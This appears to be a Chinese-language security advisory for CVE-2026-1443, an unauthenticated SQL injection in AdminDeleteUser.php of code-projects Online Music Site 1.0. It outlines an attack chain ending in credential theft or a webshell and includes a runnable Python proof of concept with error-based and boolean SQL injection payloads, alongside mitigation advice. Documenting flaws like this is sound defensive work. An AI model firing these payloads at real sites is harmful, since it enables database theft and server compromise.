CVE-2026-1443: code-projects Online Music Site 1.0 AdminDeleteUser.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-1443

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Music Site 1.0

漏洞概述

CVE-2026-1443是code-projects公司开发的Online Music Site 1.0版本中的一个高危安全漏洞。该漏洞存在于管理后台的AdminDeleteUser.php文件中，由于对用户传入的ID参数缺乏有效的输入验证和SQL语句预编译处理，导致攻击者可以通过构造恶意的SQL语句实现SQL注入攻击。攻击者无需任何认证即可远程利用此漏洞，成功利用后可获取数据库中的敏感信息，包括用户账户数据、管理员凭证等，甚至可能在特定配置下实现操作系统命令执行或数据篡改。由于该漏洞的利用复杂度较低且已有公开的漏洞利用代码（PoC），对使用该系统的企业或个人用户构成严重安全威胁。建议受影响的用户立即采取修复措施或升级到安全版本。

技术细节

该SQL注入漏洞位于code-projects Online Music Site 1.0的管理后台文件/Administrator/PHP/AdminDeleteUser.php中。漏洞产生的根本原因是对HTTP请求中的ID参数未进行充分的输入过滤和参数化查询处理。攻击者可以通过GET或POST请求向该文件传递包含SQL注入payload的参数值。典型的攻击方式是在ID参数中嵌入UNION SELECT、布尔盲注或时间盲注等SQL语句片段。由于该接口用于删除用户功能，攻击者不仅可以通过SQL注入获取数据库中的用户信息（如用户名、密码哈希、邮箱等），还可能通过UNION注入或堆叠查询执行额外的数据库操作。在某些数据库配置下，攻击者可能利用LOAD_FILE、INTO OUTFILE等函数读取服务器敏感文件或写入webshell，从而实现远程代码执行。漏洞的利用无需任何认证，任何能够访问该管理后台URL的攻击者都可以发起攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的code-projects Online Music Site 1.0版本，并定位管理后台路径/Administrator/PHP/AdminDeleteUser.php

STEP 2

步骤2: 漏洞探测

攻击者通过向AdminDeleteUser.php的ID参数发送测试payload（如单引号、UNION语句等），验证SQL注入漏洞的存在

STEP 3

步骤3: 构造恶意Payload

根据目标数据库类型，攻击者构造针对性的SQL注入payload，如UNION SELECT获取数据、时间盲注或布尔盲注等

STEP 4

步骤4: 数据提取

利用SQL注入漏洞提取数据库中的敏感信息，包括用户表中的账户、密码哈希、邮箱等数据

STEP 5

步骤5: 权限提升与持久化

如获取到管理员凭证，攻击者可登录管理后台进一步控制系统；或利用数据库的FILE权限读取服务器敏感文件或写入webshell实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-1443 SQL Injection PoC
# Target: code-projects Online Music Site 1.0
# Vulnerable File: /Administrator/PHP/AdminDeleteUser.php
# Parameter: ID

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in AdminDeleteUser.php
    Args:
        target_url: Base URL of the target site
        payload: SQL injection payload
    """
    # Construct the vulnerable URL
    vuln_url = f"{target_url}/Administrator/PHP/AdminDeleteUser.php"
    
    # Send malicious request with SQL injection payload
    params = {'ID': payload}
    
    try:
        response = requests.get(vuln_url, params=params, timeout=10)
        print(f"[*] Sending payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-1443.py <target_url>")
        print("Example: python cve-2026-1443.py http://localhost/online-music-site")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Basic detection payload
    print("[*] CVE-2026-1443 SQL Injection Test")
    print("[*] Target:", target)
    
    # Test with error-based SQL injection
    payload = "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e,VERSION(),0x7e,FLOOR(RAND(0)*2)) AS x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) AS y)-- -"
    exploit_sqli(target, payload)
    
    # Boolean-based blind SQL injection test
    payload = "1' AND 1=1-- -"
    exploit_sqli(target, payload)

if __name__ == "__main__":
    main()

影响范围

code-projects Online Music Site 1.0

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙中配置SQL注入防护规则，阻断包含可疑SQL语句的请求；对AdminDeleteUser.php文件的访问进行IP白名单限制；暂时禁用管理后台的删除用户功能或设置访问控制；定期监控Web服务器日志，及时发现异常访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1443
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1443
3 Details https://www.cvedetails.com/cve/CVE-2026-1443/
4 VulDB https://vuldb.com/cve/CVE-2026-1443
5 Link https://code-projects.org/
6 Link https://github.com/Volije/cve/issues/1
7 Link https://vuldb.com/?ctiid.342872
8 Link https://vuldb.com/?id.342872
9 Link https://vuldb.com/?submit.736967